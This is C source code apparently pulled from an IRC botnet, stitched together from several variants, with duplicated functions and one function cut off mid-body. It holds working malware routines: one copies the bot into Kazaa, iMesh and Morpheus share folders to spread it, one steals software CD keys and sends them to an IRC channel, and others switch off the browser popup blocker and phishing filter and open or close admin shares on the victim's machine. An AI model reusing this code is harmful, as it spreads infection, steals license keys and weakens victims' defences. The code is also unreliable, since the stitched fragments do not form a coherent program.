BOOL RegExists(HKEY root,LPCTSTR subkey,char *name,DWORD type)
{
BOOL bRet=FALSE;
HKEY key=NULL;
if (!subkey || !name)
return bRet;
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
if (type==REG_DWORD)
{
BOOL success=FALSE;
DWORD dwRet=RegQuery(root,subkey,name,&success);
if (success)
bRet=TRUE;
else
bRet=FALSE;
}
else if (type==REG_SZ || type==REG_EXPAND_SZ || type==REG_MULTI_SZ)
{
char *szRet=RegQuery(root,subkey,name,REG_SZ);
if (szRet)
bRet=TRUE;
else
bRet=FALSE;
}
fRegCloseKey(key);
}
return bRet;
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
HKEY hkey;
LONG lRet;
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
// KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
return;
}
char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{
HKEY key=NULL;
DWORD dwRes=65535;
static char szRegBuffer[65535+2];
ZeroMemory(szRegBuffer,65535);
if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
{
if(fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes) == ERROR_SUCCESS)
{
if (type==REG_MULTI_SZ)
{
szRegBuffer[dwRes] = '\0'; // Ensure termination
// Skip back through ALL the null chars first
while (szRegBuffer[dwRes]=='\0' && dwRes != 0)
--dwRes;
for (unsigned int i=0; i<dwRes; ++i)
{
if (szRegBuffer[i]=='\0')
szRegBuffer[i]='\n'; // Convert to \n
}
}
fRegCloseKey(key);
return szRegBuffer;
}
fRegCloseKey(key);
}
return '\0';
}
/* Anti pop up blocker for IE6/7 */
int popdown()
{
DWORD z = 00000000;
HKEY hRegKey;
fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\New Windows", NULL, NULL, &hRegKey);
fRegSetValueEx(hRegKey,"PopupMgr",NULL,REG_DWORD,(LPBYTE) &z,sizeof(DWORD));
Sleep(5000);
return 1;
}
/* IE7 Anti Phisher killer */
int phishfuck()
{
DWORD ff = 00000000;
HKEY hRegKey;
fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\PhishingFilter", NULL, NULL, &hRegKey);
fRegSetValueEx(hRegKey,"Enabled",NULL,REG_DWORD,(LPBYTE) &ff,sizeof(DWORD));
Sleep(5000);
return 1;
}
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name)
{
HKEY key=NULL;
if (!subkey)
return FALSE;
if (!name)
{
if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS)
return TRUE;
DWORD inx = 0;
DWORD chr = 256;
char buf[256] = {0};
FILETIME ftm;
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm);
while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) {
RegDelete(root,subkey,buf);
cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm);
}
fRegDeleteKey(key,subkey);
}
}
else
{
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
if (fRegDeleteValue(key,name) == ERROR_SUCCESS)
{
fRegCloseKey(key);
return TRUE;
}
fRegCloseKey(key);
}
}
return FALSE;
}
void iMeshInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey = NULL;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
void KazaaInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
replacestr(buffer, "012345:", "");
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
void MorpheusInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
_snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
CreateDirectory(buffer, 0);
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{
HKEY key=NULL;
DWORD dwType=REG_DWORD,dwSize=sizeof(DWORD),dwRead=0;
if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS)
{
if(fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize)==ERROR_SUCCESS)
{
fRegCloseKey(key);
success=TRUE;
return dwRead;
}
fRegCloseKey(key);
}
success=FALSE;
return 0;
}
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
unsigned char szDataBuf[128];
FILE *fp;
HKEY hkey;
LONG lRet;
DWORD dwSize = 128;
for (unsigned int i=0; regkeys[i].subkey; i++) {
lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
if (regkeys[i].file) {
sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
if((fp=fopen(szPath,"r"))!=NULL) {
while(fgets(line,sizeof(line),fp)) {
if(!strstr(line, regkeys[i].tag)) {
if (strchr(regkeys[i].tag,'=')) {
strtok(line,"=");
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
} else
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
irc_privmsg(sock,chan,sendbuf,notice);
addlog(sendbuf);
break;
}
}
fclose(fp);
}
} else {
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
irc_privmsg(sock,chan,sendbuf,notice);
addlog(sendbuf);
}
}
fRegCloseKey(hkey);
}
return;
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
SOCKET sock;
HKEY hkey;
char sendbuf[IRCLINE];
char current[20];
LONG lRet;
sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
strcpy(current,viruses[i].file);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
if(listProcesses(sock,NULL,FALSE,current) == 1)
sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
else
sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
//KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
sprintf(sendbuf,"[AV]: Antivirus search complete! ");
return;
}
char *GetFirefoxLibPath()
{
char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
char path[_MAX_PATH] ="";
char *firefoxPath = NULL;
DWORD pathSize = _MAX_PATH;
DWORD valueType;
HKEY rkey;
// Open firefox registry key
if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
{
//DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
return NULL;
}
// Read the firefox path value
if( fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
{
//DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry ");
fRegCloseKey(rkey);
return NULL;
}
if( pathSize <= 0 || path[0] == 0)
{
//DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty");
fRegCloseKey(rkey);
return NULL;
}
fRegCloseKey(rkey);
// This path may contain extra double quote....
if( path[0] == '\"' )
{
for(unsigned int i=0; i< strlen(path)-1 ; i++)
path[i] = path[i+1];
}
//DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path);
// Terminate the string at last "\\"
for(int j=strlen(path)-1; j>0; j--)
{
if( path[j] == '\\' )
{
path[j]=0;
break;
}
}
firefoxPath = (char*) malloc( strlen(path) + 1);
if( firefoxPath )
strcpy(firefoxPath, path);
//DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath);
return firefoxPath;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
return TRUE;
}
BOOL UnSecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="Y";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Enable DCOM failed.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: DCOM enabled.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000000;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Failed to unrestrict access to the IPC$ Share.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: Unrestricted access to the IPC$ Share.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ restriction registry key.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (!nonetapi32) {
for(int i=0;i < ((sizeof(ShareList) / sizeof (NetShares)) - 2);i++) {
if(ShareAdd(NULL,ShareList[i].ShareName,ShareList[i].SharePath) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
char sharename[10], sharepath[10];
DWORD dwDrives = GetLogicalDrives();
for(char cDrive='A'; dwDrives!=0; cDrive++, dwDrives=(dwDrives>>1)) {
if((dwDrives & 1)==1 && cDrive != 'A') {
_snprintf(sharename,sizeof(sharename),"%c$",cDrive);
_snprintf(sharepath,sizeof(sharepath),"%c:\\",cDrive);
if (fGetDriveType(sharepath) == DRIVE_FIXED) {
if(ShareAdd(NULL,sharename,sharepath) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",sharename);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",sharename);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
}
sprintf(sendbuf,"4<<12[SECURE]: Network shares added.4>>");
} else
BOOL RegQuery(HKEY root,LPCTSTR subkey,char *target,void *conn)
{
IRC* irc=(IRC*)conn;
HKEY key=NULL;
DWORD dwRet;
DWORD cSubKeys=0;// number of subkeys
DWORD cValues;// number of values for key
DWORD dwMaxSubKey;// longest subkey size
DWORD dwMaxClass;// longest class string
DWORD dwMaxValue;// longest value name
DWORD dwMaxValueData;// longest value data
DWORD dwsd;// size of security descriptor
char szKeyName[MAX_KEY_LENGTH];
DWORD dwKeySize=MAX_KEY_LENGTH;
TCHAR szValueName[MAX_VALUE_NAME];
DWORD dwValueSize=MAX_VALUE_NAME;
DWORD dwValueType;
char szKeyClass[128];
DWORD dwClassSize=sizeof(szKeyClass);
FILETIME lpft;
int i;
int isent=0;
//static char szRegBuffer[65535+2];
//ZeroMemory(szRegBuffer,65535);
if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
{
// Get the class name and the value count.
dwRet=fRegQueryInfoKey(key,szKeyClass,&dwClassSize,NULL,&cSubKeys,&dwMaxSubKey,
&dwMaxClass,&cValues,&dwMaxValue,&dwMaxValueData,&dwsd,&lpft);
int t=0;
// Enumerate the subkeys
if (cSubKeys)
{
//irc->privmsg(target,"%s Number of subkeys: %d",reg_title,cSubKeys);
for (i=0; i<cSubKeys; i++,t++)
{
dwKeySize=MAX_KEY_LENGTH;
dwRet=fRegEnumKeyEx(key,i,szKeyName,&dwKeySize,NULL,NULL,NULL,&lpft);
if (dwRet == ERROR_SUCCESS)
{
irc->privmsg(target,"(%.2d) %s\\%s",t+1,subkey,szKeyName);
isent++;
}
}
}
// Enumerate the key values.
if (cValues)
{
//irc->privmsg(target,"Number of values: %d",cValues);
for (i=0, dwRet=ERROR_SUCCESS; i<cValues; i++,t++)
{
dwValueSize=MAX_KEY_LENGTH;
szValueName[0] = '\0';
dwRet=fRegEnumValue(key,i,szValueName,&dwValueSize,NULL,&dwValueType,NULL,NULL);
if (dwRet == ERROR_SUCCESS)
{
if (!strcmp(szValueName,"") && dwValueType==REG_SZ)
sprintf(szValueName,"(Default)");
irc->privmsg(target,"(%.2d) %s\\%s (%s)",t+1,subkey,szValueName,GetType(dwValueType));
isent++;
}
}
}
fRegCloseKey(key);
}
else
return FALSE;
if (isent>0)
return TRUE;
return FALSE;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
else
sprintf(sendbuf,"[SECURE]: DCOM disabled.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
else
sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
else
sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_LSARESTRICT
DWORD dwRet;
if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
else
sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
#endif
} else
sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_NET
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
char* szShareName = new char[wcslen(p->shi502_netname)+1];
WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);
if(ShareDel(NULL,szShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
delete szShareName;
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"[SECURE]: Network shares deleted.");
} else
sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
#endif
return TRUE;
}
